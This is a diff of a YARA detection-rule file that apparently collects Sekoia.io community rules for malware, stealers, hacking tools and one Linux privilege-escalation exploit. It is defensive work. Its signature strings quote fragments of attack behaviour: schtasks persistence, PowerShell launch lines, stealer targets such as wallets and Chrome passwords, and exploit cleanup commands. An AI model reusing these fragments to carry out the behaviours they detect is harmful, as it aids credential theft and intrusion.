+		$stub = "This program cannot be run in DOS mode" xor
+		$res1 = "5w>w9wR'31Z" xor
+		$res2 = "r0y0~0KlBD" xor
+		$res3 = "d&o&h&öé7Æ" xor
+		$res4 = "9{2{5{+0" xor
 
 	condition:
-		$down in ( @sleep .. @sleep + 1000 )
+		$stub and any of ( $res* ) and not $clear and filesize < 3MB
 }
-rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
+rule SEKOIA_Malicious_Lnk_Exploiting_Webdav_Share_Generic : FILE
 {
 	meta:
-		description = "Detects stealer module of XDealer"
+		description = "Detects some malicious LNK"
 		author = "Sekoia.io"
-		id = "6314cf6c-2c3b-4e9a-87a1-b56ee148474c"
-		date = "2024-03-22"
+		id = "b228643c-ab23-46e1-b170-3da6bcb2dd23"
+		date = "2024-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_implant_xdealer_stealer_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "79ba2fd14cd2eb73848026f79ce6115df813e0fda3a071ab26659874e04e2201"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/malicious_lnk_exploiting_webdav_share_generic.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "cffb40e13e3aa6761330090b42314c36"
+		logic_hash = "8179ef8ac43cb67a1b70baf7824452834f498d988df84e138c857ac0ef164b4b"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228495,27 +229115,26 @@ rule SEKOIA_Apt_Implant_Xdealer_Stealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "%sbmp.tmp"
-		$ = "%sjgp.tmp"
-		$ = "%sma_%s_%05u_%u."
-		$ = "%s%s_%05u_%u."
+		$ = "powershell.exe" wide
+		$ = "-Name explorer; \\\\" wide
+		$ = "@80\\"
+		$ = "desktop-tcrdu4c"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		uint32be( 0 ) == 0x4c000000 and 2 of them
 }
-
-rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
+rule SEKOIA_Exploit_Linux_Eop_Ubuntu_Overlayfs_Local_Privesc_Strings : FILE
 {
 	meta:
-		description = "Detect the TONEINS implant used by Mustang Panda"
+		description = "Detects Ubuntu OverlayFS Local Privesc exploit"
 		author = "Sekoia.io"
-		id = "f178217a-ff28-4dd7-9395-f19f3e2e934c"
-		date = "2022-11-28"
+		id = "5e0e73f5-4cb3-4a79-adac-578b17ed7660"
+		date = "2023-12-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_mustang_panda_toneins.yar#L4-L44"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "b71932f16ffb1d8d1780b6f9b4db2f0c98d1c770829a4d2284e78c19d37e54bb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_linux_eop_ubuntu_overlayfs_local_privesc_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "48ff9d2a10eef1e9b9088ba4a53aa77f43324e5d51da65b65a5829276067f011"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228523,39 +229142,28 @@ rule SEKOIA_Apt_Mustang_Panda_Toneins : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$rtti1 = ".?AVDNameNode@@"
-		$rtti2 = ".?AVcharNode@@"
-		$rtti3 = ".?AVpcharNode@@"
-		$rtti4 = ".?AVpDNameNode@@"
-		$rtti5 = ".?AVDNameStatusNode@@"
-		$rtti6 = ".?AVpairNode@@"
-		$s1 = "DefWindowProcW1222_test" wide ascii
-		$s2 = "schtasks /create /sc minute /mo 2 /tn" wide ascii
-		$fnv_CreateFile = {CE C9 CA BD}
-		$fnv_GetFileSize = {18 81 ED 44}
-		$fnv_ReadFile = {43 C9 FC 54}
-		$fnv_CloseHandle = {65 00 BA FA}
-		$fnv_WriteFile = {4A C4 07 7F}
-		$fnv_CreateEventA = {E2 DD D2 F9}
-		$fnv_TerminateProcess = {59 EE 4E F8}
-		$fnv_GetCurrentProcess = {45 A8 D8 6D}
-		$fnv_CreateProcessA = { 09 0A 7C 4A}
+		$ = "./ovlcap"
+		$ = "rm -rf '%s/'"
+		$ = "./ovlcap/work"
+		$ = "./ovlcap/lower"
+		$ = "./ovlcap/upper"
+		$ = "./ovlcap/merge"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and 4 of ( $rtti* ) and filesize < 8MB and ( for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "69f400d3ff4679294e63fb8a8ca97dbb" ) or ( all of ( $s* ) and 5 of ( $fnv* ) ) )
+		uint32be( 0 ) == 0x7f454c46 and filesize < 1MB and all of them
 }
-rule SEKOIA_Apt_Oilrig_Odagent_Strings : FILE
+rule SEKOIA_Tool_Printnotifypotato : FILE
 {
 	meta:
-		description = "Detects ODAgent malware based on strings"
+		description = "No description has been set in the source file - SEKOIA"
 		author = "Sekoia.io"
-		id = "1c5c0eb5-7c6f-4a34-b2e2-4a7c6d7030d6"
-		date = "2023-12-20"
+		id = "8dde175f-025a-4c27-bcc6-d0016dd7238c"
+		date = "2023-08-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_oilrig_odagent_strings.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "14a1399ff3519632e3bbb6eea0d44e9908cfc03728bd26f610ab75fff6a8d2c6"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_printnotifypotato.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5d4b7d1582c2b3f53ca5e1ff6e7ff97a677fe8870e94415f7328ea0a0387049c"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228563,27 +229171,28 @@ rule SEKOIA_Apt_Oilrig_Odagent_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "application/x-www-form-urlencoded" ascii wide
-		$ = "dly>" ascii wide
-		$ = "DELETE" ascii wide
-		$ = "nok!" ascii wide
-		$ = ".c:/content" ascii wide
+		$s1 = "PrintNotifyPotato.exe" ascii wide
+		$s2 = "BeichenDream" ascii wide
+		$s3 = "interactive" ascii wide
+		$s4 = "DuplicateTokenEx" ascii wide
+		$s5 = "CurrentUser" ascii wide
+		$s6 = "FakeIUnknown" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 5MB and all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 8MB and all of them
 }
-rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
+rule SEKOIA_Apt_Badmagic_Startrevsocks_Pshscript : FILE
 {
 	meta:
-		description = "Detects mimikat_ssp"
+		description = "Detects BadMagic DLL Loader powershell script"
 		author = "Sekoia.io"
-		id = "33b3620f-e02d-4d29-adcc-fea3b49ab780"
-		date = "2023-11-22"
+		id = "a6c96aee-9e78-47d2-afe3-f3c5246a9370"
+		date = "2023-05-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_mimikat_ssp_strings.yar#L1-L20"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "06325bf495963db90b14fb16a5f3eafda9e4554f753d04405af51c6041a9b166"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_badmagic_startrevsocks_pshscript.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "6a4615afb836330634cde9559dacfff50daef44a370f6191c6771a2066074a31"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228591,27 +229200,25 @@ rule SEKOIA_Hacktool_Mimikat_Ssp_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "[*] Building RPC packet" ascii
-		$ = "[*] Connecting to lsasspirpc RPC service" ascii
-		$ = "[*] Sending SspirConnectRpc call" ascii
-		$ = "[*] Sending SspirCallRpc call" ascii
+		$ = "$ExecutablePath"
+		$ = "Start-Sleep -Second 2"
+		$ = "recn -15 -rect 15"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 500KB and all of them
+		all of them and filesize < 1KB
 }
-
-rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
+rule SEKOIA_Apt_Qnapworm_Loader_May2022 : FILE
 {
 	meta:
-		description = "Detect Blackfly proxy configuration tool"
+		description = "Detects the QNAPWorm loader"
 		author = "Sekoia.io"
-		id = "c8a8be5d-bd28-4306-9466-ad582e53fede"
-		date = "2023-02-28"
+		id = "c6e87a55-73ea-4df4-ab61-b5d34968d741"
+		date = "2022-05-23"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_blackfly_proxy_config.yar#L4-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "a421d933209f3a81f7430f1b933074701a1fc965c1b4bc321cc7b4e89802f483"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_qnapworm_loader_may2022.yar#L1-L28"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "d31fdaaacd417a4191e79e3a287e84c55109158eaacc789b2129e2ba94e443f6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228619,47 +229226,64 @@ rule SEKOIA_Tool_Win_Blackfly_Proxy_Config : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "c:\\ProgramData\\l.dat"
-		$ = "C:\\ProgramData\\b.dat"
-		$ = "winmm_DotNetfile.dll"
+		$s1 = {
+        66 C1 C0 05
+        0F B7 D8
+        81 C3 85 D0 FF FF
+        66 C1 C3 02
+        0F B7 C3
+        0F B6 9A ?? ?? ?? ??
+        33 D8
+        88 1C 11
+        42
+        0F B6 D2
+        81 FA ?? 00 00 00
+        }
 
 	condition:
-		pe.imphash( ) == "ff47f65286cc51a1328bc94efbf4007f" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f5923d4331f7e84fbbbd6fd84b6d3e6a" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "56acc10233c711a4eba9ca9aeab47e30" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "824dcebe93ac83bf5c95c781a60b3578" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ec716a08b5e647f5c00c5dfc079dfa62" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5cb63f7392c9e05c22e89cd86bd7f718" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ee04e245066e25edd3062d823f15deda" ) or ( uint16( 0 ) == 0x5A4D and 1 of them )
+		uint16be( 0 ) == 0x4d5a and all of ( $s* )
 }
 
-rule SEKOIA_Ransomware_Win_Blackmatter
+rule SEKOIA_Merlin_Win_Dll : FILE
 {
 	meta:
-		description = "Detect Black matter ransomware (2021-07-23)"
+		description = "Detects Merling agent (DLL)"
 		author = "Sekoia.io"
-		id = "9b2d8ac3-b4d1-40f5-ac57-411547dcb2cf"
-		date = "2021-08-03"
+		id = "c9c57f5e-26c3-43be-b2cf-10f5129d3be5"
+		date = "2022-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/ransomware_win_blackmatter.yar#L4-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "5a407a9901314211e13bef30254f1d129cf3c731ea970abff8602f1ae40177cb"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/merlin_win_dll.yar#L4-L42"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "eefaed10bd3accc884673437a1cc6b8c503db4ef797e58bd95daec36a297c4be"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
+	strings:
+		$s1 = ".CRT" ascii
+		$s2 = ".tls" ascii
+		$s3 = "github.com/Ne0nd0g/merlin" ascii
+		$s4 = "github.com/lucas-clemente" ascii
+		$s5 = "SendMerlinMessage" ascii
+
 	condition:
-		for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "5e89d335de2021a2c268acf00ec513e5" )
+		uint16( 0 ) == 0x5A4D and pe.imphash ( ) == "da7f8acb6151c95be088a02465d68ef8" and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "491d9a18aea3d0eb3653fdaf0b9b86bb" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "bf619eac0cdf3f68d496ea9344137e8b" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "ce7969c1e894363133e386361be064e5" ) and for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "c6179cdcd9ba0758a18a1280f98062eb" ) and all of them and $s1 at 712 and $s2 at 752 and filesize < 15MB
 }
-rule SEKOIA_Tool_Win_Snap2Html : FILE
+rule SEKOIA_Downloader_Mac_Smooth_Operator : FILE
 {
 	meta:
-		description = "Finds Snap2HTML samples based on specific strings. Legitimate tool used by ransomware affiliates to perform discovery"
+		description = "Detect the Smooth_Operator malware"
 		author = "Sekoia.io"
-		id = "9865daac-f23b-417e-813e-cbed03f45161"
-		date = "2024-02-08"
+		id = "c132b3f0-f536-4a66-bcf8-2a95c258c414"
+		date = "2023-07-04"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/tool_win_snap2html.yar#L1-L26"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "8805a80193ba1323dffd68456833f27cc93f2182660a5047dbe69e8ed65ac184"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_mac_smooth_operator.yar#L1-L16"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "031f766d6ab7d94ed7ba4324d4bdfa3fbc11986fba35487a88a1ee3aba090c82"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228667,61 +229291,52 @@ rule SEKOIA_Tool_Win_Snap2Html : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "Snap2HTML.exe" fullword wide ascii
-		$str02 = "Snap2HTML.Properties" ascii
-		$str03 = "set_txtRoot" ascii
-		$str04 = "set_chkHidden" ascii
-		$str05 = "set_chkSystem" ascii
-		$str06 = "set_chkLinkFiles" ascii
-		$str07 = "set_txtLinkRoot" ascii
-		$str08 = "set_chkOpenOutput" ascii
-		$str09 = "set_txtTitle" ascii
-		$str10 = "get_CancellationPending" ascii
-		$str11 = "set_RootFolder" ascii
-		$str12 = "add_SettingsLoaded" ascii
+		$ = "%s/.main_storage"
+		$ = "%s/UpdateAgent"
 
 	condition:
-		uint16( 0 ) == 0x5a4d and 7 of them
+		uint32be( 0 ) == 0xcafebabe and all of them
 }
-
-rule SEKOIA_Merlin_Linux_Elf : FILE
+rule SEKOIA_Apt_Unc4990_Explorer_Ps1
 {
 	meta:
-		description = "Detects Merling agent (ELF)"
+		description = "Detects powershell script (explorer.ps1)"
 		author = "Sekoia.io"
-		id = "d9c57f5e-26c3-43be-b2cf-10f5129d3be6"
-		date = "2022-01-03"
+		id = "2e1abbbf-f9b7-4147-b7da-3544cbc4a5f1"
+		date = "2024-02-01"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/merlin_linux_elf.yar#L4-L34"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f7edd517a575b54c9ee8acdc7a5ebac7c0c9eb286abc49e2962b02aad40e5973"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_unc4990_explorer_ps1.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "5085f738e23b801c7e36408d189755086d91c0bb266af6738c80510eb85e598f"
 		score = 75
 		quality = 80
-		tags = "FILE"
+		tags = ""
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "github.com/Ne0nd0g/merlin" ascii
-		$s2 = "github.com/refraction-networking" ascii
-		$s3 = "SendMerlinMessage" ascii
+		$s0 = "$(get-location).Path"
+		$s1 = "+ \"\\Runtime Broker.exe"
+		$s2 = "Start-Process -FilePath"
+		$s3 = "-Wait;"
+		$s4 = "Start-Sleep -s"
 
 	condition:
-		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "80199718ff1821a3fe914cd2279ab3a0" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and all of them and filesize < 15MB
+		all of them and @s3- @s2 < 35
 }
-rule SEKOIA_Apt_Andariel_Dorarat_Strings : FILE
+rule SEKOIA_Hacktool_Duplicatedump_Strings : FILE
 {
 	meta:
-		description = "Detects Dora RAT based on strings"
+		description = "Detects Duplicate Dump"
 		author = "Sekoia.io"
-		id = "30388291-a287-489f-a060-c90a16cda217"
-		date = "2024-06-17"
+		id = "081d0124-4afe-418b-9767-3d987c0107ca"
+		date = "2023-11-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_andariel_dorarat_strings.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "21e1c77d486cbf6ddaa2eca673275c7c21cc59fa9551c2eb02c526518ed5b217"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_duplicatedump_strings.yar#L1-L21"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "feff083ed432781884941fc02eee6d6ce54f70f1b85d24db2f3e1d0147a81a7a"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228729,26 +229344,27 @@ rule SEKOIA_Apt_Andariel_Dorarat_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$x1 = "/encryption.go" ascii fullword
-		$x2 = "/handshake.go" ascii fullword
-		$x3 = "/trans_module.go" ascii fullword
-		$enc_rsc = { 14 02 72 14 D3 4C 4A 49 55 36 14 DF 8D 6F 2D CF }
+		$ = "7d872e921a4b4b1b8b295395099b0209" wide ascii
+		$ = "[+] Named pipe connected and replying with current PID" wide ascii
+		$ = "[X] Named pipe connection error:" wide ascii
+		$ = "[X] Error occur while compressing file:" wide ascii
+		$ = "[+] Dump file saved to" wide ascii
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and ( all of ( $x* ) or $enc_rsc )
+		uint16be( 0 ) == 0x4d5a and filesize < 500KB and 4 of them
 }
-rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
+rule SEKOIA_Crime_Sload_Vbs_Downloader_Strings_2 : FILE
 {
 	meta:
-		description = "Detects Gamaredon's GammaLoad HTA"
+		description = "Detects an sLoad downloader based on strings"
 		author = "Sekoia.io"
-		id = "e5e502db-7f37-40f2-9ba3-81e158e767db"
-		date = "2022-08-01"
+		id = "77ff0d21-9249-43b2-9a6d-87988a2dec3b"
+		date = "2022-08-02"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_gamaredon_gammaload_malicioushta.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "e41ce63e7c6df2edb548ddc57d51af914dab9200e37eb12463169d587205aa7a"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/crime_sload_vbs_downloader_strings_2.yar#L1-L17"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "06e4fcb6c48078c6c44d779820fc901b0f335b9495097ed28206826a959d0712"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228756,27 +229372,29 @@ rule SEKOIA_Apt_Gamaredon_Gammaload_Malicioushta : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "platform = window.navigator?.userAgentData?.platform" ascii fullword
-		$s2 = "'Win32', 'Win64', 'Windows', 'WinCE'" ascii
-		$s3 = "dcreate.download ="
-		$s4 = "dcreate.href = 'data:application/x-rar-compressed;base64"
-		$s5 = "= \"UmFyI"
+		$ = "On Error Resume Next"
+		$ = {0A [4] 3D 41 72 72 61 79}
+		$ = { 2E 50 61 74 74 65 72 6E 20 3D 20 22 28 [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C [4-10] 7C }
 
 	condition:
-		uint32be( 0 ) == 0x3c68746d and filesize < 400KB and filesize > 50KB and 4 of them
+		all of them and filesize < 20KB
 }
-rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
+rule SEKOIA_Apt_Icepeony_Iceevent : FILE
 {
 	meta:
-		description = "AxileStealer strings"
+		description = "Detects IceEvent Backdoor"
 		author = "Sekoia.io"
-		id = "412bfc3e-6bb7-4b0d-8bb3-96eae0cc9782"
-		date = "2023-12-13"
+		id = "7d1f8b90-fde4-4d5c-a8a3-375db8aa88a1"
+		date = "2024-10-21"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/pe_stealer_axilestealer_strings.yar#L1-L28"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "829b80c07ed4d9439d66956dbb106aa0cc9961dd2e5c05ffbe6c67e516613590"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_icepeony_iceevent.yar#L1-L24"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "07c291c9cea4430676c303128bbbb8e3"
+		hash = "489b573b37ab8bc74cca3704e723b895"
+		hash = "265f6cf778d26e62903fb295f89507e3"
+		hash = "f5eb28dd29c91cc84818b74d7f138ff6"
+		logic_hash = "8afe4a94513e9aa5d20849153c76cfe5c684c9a529710947930c76098a36540e"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228784,34 +229402,27 @@ rule SEKOIA_Pe_Stealer_Axilestealer_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "http://ip-api.com/line/?fields=query,country,countryCode,city,regionName,zip,isp" wide
-		$s2 = "Axile.su" wide
-		$s3 = "Unknown Tokens.txt" wide
-		$a1 = "[ <b>General</b> ]" wide
-		$a2 = "[ <b>Browsers</b> ]" wide
-		$a3 = "[ <b>Wallets</b> ]" wide
-		$a4 = "[ <b>Messengers</b> ]" wide
-		$a5 = "[ <b>Applications</b> ]" wide
-		$a6 = "[ <b>Games</b> ]" wide
-		$a7 = "[ <b>Mails</b> ]" wide
-		$a8 = "[ <b>VPNs</b> ]" wide
-		$a9 = "[ <b>FTPs</b> ]" wide
+		$ = "Created a process" ascii fullword
+		$ = "CreateProcess failed: %d"
+		$ = "bind error:"
+		$ = "Error creating pip: %d"
+		$ = "listen error:"
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize > 50KB and filesize < 200KB and 2 of ( $s* ) and 7 of ( $a* )
+		uint16be( 0 ) == 0x4d5a and 4 of them and filesize < 500KB
 }
-rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
+rule SEKOIA_Infostealer_Win_Edgeguard : FILE
 {
 	meta:
-		description = "Detects malicious TOR redirection affecting RDP, NetBios"
+		description = "Finds EdgeGuard Stealer samples based on specific strings"
 		author = "Sekoia.io"
-		id = "1e5c469b-f721-44af-87b3-1adf423719c1"
-		date = "2023-09-07"
+		id = "bbdb362f-d235-48f8-8fa5-d340d4e3e3f0"
+		date = "2023-08-22"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/generic_tor_hidden_service_leading_to_winports.yar#L1-L21"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "39db199ba7fede8df4bdb505b071240dda96b74f66f818f90047dad338dc4a72"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_edgeguard.yar#L1-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "11396aea2e166456ec8311f95a8037aac41f69caf3158f8c19cb0c38327842d6"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -228819,27 +229430,40 @@ rule SEKOIA_Generic_Tor_Hidden_Service_Leading_To_Winports : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "HiddenServiceDir "
-		$s2 = "SocksPort "
-		$s3 = "HiddenServicePort "
-		$s4 = ":3389"
-		$s5 = ":445"
+		$str01 = "main.downloadnecessary" ascii
+		$str02 = "main.extractchromepasswords" ascii
